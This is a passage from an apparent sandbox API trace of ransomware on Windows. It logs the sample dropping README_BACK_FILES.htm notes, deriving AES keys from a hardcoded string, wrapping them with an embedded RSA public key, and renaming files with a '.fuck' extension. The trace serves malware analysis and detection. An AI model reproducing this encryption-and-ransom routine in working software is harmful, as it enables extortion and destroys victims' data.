(in: hFile=0x5d14, lpBuffer=0x2b9d7f8*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d7f0, lpOverlapped=0x0 | out: lpBuffer=0x2b9d7f8*, lpNumberOfBytesWritten=0x2b9d7f0*=0x5ec, lpOverlapped=0x0) returned 1 [0236.499] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.499] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0xffffffff [0236.500] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\readme_back_files.htm")) returned 0xffffffff [0236.500] AreFileApisANSI () returned 1 [0236.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6ab0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0236.500] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.500] GetLastError () returned 0x5 [0236.500] GetLastError () returned 0x5 [0236.500] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.500] FindClose (in: hFindFile=0x28171d8 | out: hFindFile=0x28171d8) returned 1 [0236.501] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\readme_back_files.htm")) returned 0xffffffff [0236.501] AreFileApisANSI () returned 1 [0236.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0236.501] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.501] GetLastError () returned 0x5 [0236.501] GetLastError () returned 0x5 [0236.501] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.501] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0xffffffff [0236.501] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\readme_back_files.htm")) returned 0xffffffff [0236.502] AreFileApisANSI () returned 1 [0236.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f7088, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0236.502] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.502] GetLastError () returned 0x5 [0236.502] GetLastError () returned 0x5 [0236.502] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.502] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0236.502] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\readme_back_files.htm")) returned 0xffffffff [0236.502] AreFileApisANSI () returned 1 [0236.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd538, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0236.503] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.503] GetLastError () returned 0x5 [0236.503] GetLastError () returned 0x5 [0236.503] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.503] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\DataMart\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817458 [0236.503] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.503] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.503] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28170d8 [0236.504] FindNextFileA (in: hFindFile=0x28170d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.504] FindNextFileA (in: hFindFile=0x28170d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.504] FindClose (in: hFindFile=0x28170d8 | out: hFindFile=0x28170d8) returned 1 [0236.504] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\datamart\\paidwifi\\readme_back_files.htm")) returned 0xffffffff [0236.504] AreFileApisANSI () returned 1 [0236.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6d18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0236.504] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\datamart\\paidwifi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0236.505] GetFileType (hFile=0x5d10) returned 0x1 [0236.505] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9db94*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9db8c, lpOverlapped=0x0 | out: lpBuffer=0x2b9db94*, lpNumberOfBytesWritten=0x2b9db8c*=0x5ec, lpOverlapped=0x0) returned 1 [0236.507] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.507] FindClose (in: hFindFile=0x2817458 | out: hFindFile=0x2817458) returned 1 [0236.507] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\DataMart\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\datamart\\readme_back_files.htm")) returned 0xffffffff [0236.507] AreFileApisANSI () returned 1 [0236.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0236.507] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\DataMart\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\datamart\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.507] GetLastError () returned 0x5 [0236.507] GetLastError () returned 0x5 [0236.507] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.508] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817458 [0236.508] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.508] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.509] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817198 [0236.509] FindNextFileA (in: hFindFile=0x2817198, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.509] FindNextFileA (in: hFindFile=0x2817198, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.509] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2817298 [0236.512] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.512] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.512] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.512] GetLastError () returned 0x5 [0236.513] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png")) returned 0x20 [0236.513] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", dwFileAttributes=0x80) returned 0 [0236.514] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.514] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.514] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg", dwFileAttributes=0x2) returned 0 [0236.515] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2815dd0) returned 1 [0236.519] CryptCreateHash (in: hProv=0x2815dd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.519] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.519] CryptHashData (hHash=0x28173d8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.519] CryptDeriveKey (in: hProv=0x2815dd0, Algid=0x6610, hBaseData=0x28173d8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28172d8) returned 1 [0236.519] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.519] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.519] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2816540) returned 1 [0236.520] CryptImportPublicKeyInfo (in: hCryptProv=0x2816540, dwCertEncodingType=0x1, pInfo=0x28095a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28095d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28095d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817358) returned 1 [0236.520] CryptEncrypt (in: hKey=0x2817358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.520] CryptEncrypt (in: hKey=0x2817358, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2816298*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2816298*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.521] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2816298, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.521] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.521] CryptEncrypt (in: hKey=0x28172d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.521] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.521] CloseHandle (hObject=0xffffffff) returned 1 [0236.521] CloseHandle (hObject=0xffffffff) returned 1 [0236.521] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), bFailIfExists=0) returned 0 [0236.521] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", dwFileAttributes=0x0) returned 0 [0236.521] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg")) returned 0 [0236.522] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.fuck")) returned 0 [0236.522] CryptDestroyHash (hHash=0x28173d8) returned 1 [0236.522] CryptDestroyKey (hKey=0x28172d8) returned 1 [0236.522] CryptReleaseContext (hProv=0x2815dd0, dwFlags=0x0) returned 1 [0236.522] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.522] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.522] GetLastError () returned 0x5 [0236.522] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml")) returned 0x20 [0236.523] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0236.523] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.523] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.523] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.524] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28165c8) returned 1 [0236.529] CryptCreateHash (in: hProv=0x28165c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.529] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.529] CryptHashData (hHash=0x2816e98, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.529] CryptDeriveKey (in: hProv=0x28165c8, Algid=0x6610, hBaseData=0x2816e98, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817218) returned 1 [0236.529] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.529] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.529] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2816320) returned 1 [0236.531] CryptImportPublicKeyInfo (in: hCryptProv=0x2816320, dwCertEncodingType=0x1, pInfo=0x2809c20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809c50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809c58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2816e18) returned 1 [0236.531] CryptEncrypt (in: hKey=0x2816e18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.531] CryptEncrypt (in: hKey=0x2816e18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815ff0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2815ff0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.531] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815ff0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.531] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.531] CryptEncrypt (in: hKey=0x2817218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.531] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.531] CloseHandle (hObject=0xffffffff) returned 1 [0236.531] CloseHandle (hObject=0xffffffff) returned 1 [0236.531] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), bFailIfExists=0) returned 0 [0236.532] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", dwFileAttributes=0x0) returned 0 [0236.532] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg")) returned 0 [0236.532] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.fuck")) returned 0 [0236.533] CryptDestroyHash (hHash=0x2816e98) returned 1 [0236.533] CryptDestroyKey (hKey=0x2817218) returned 1 [0236.533] CryptReleaseContext (hProv=0x28165c8, dwFlags=0x0) returned 1 [0236.533] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.533] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.533] GetLastError () returned 0x5 [0236.533] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png")) returned 0x20 [0236.534] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", dwFileAttributes=0x80) returned 0 [0236.534] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.534] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.535] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg", dwFileAttributes=0x2) returned 0 [0236.535] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2815ee0) returned 1 [0236.540] CryptCreateHash (in: hProv=0x2815ee0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.540] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.540] CryptHashData 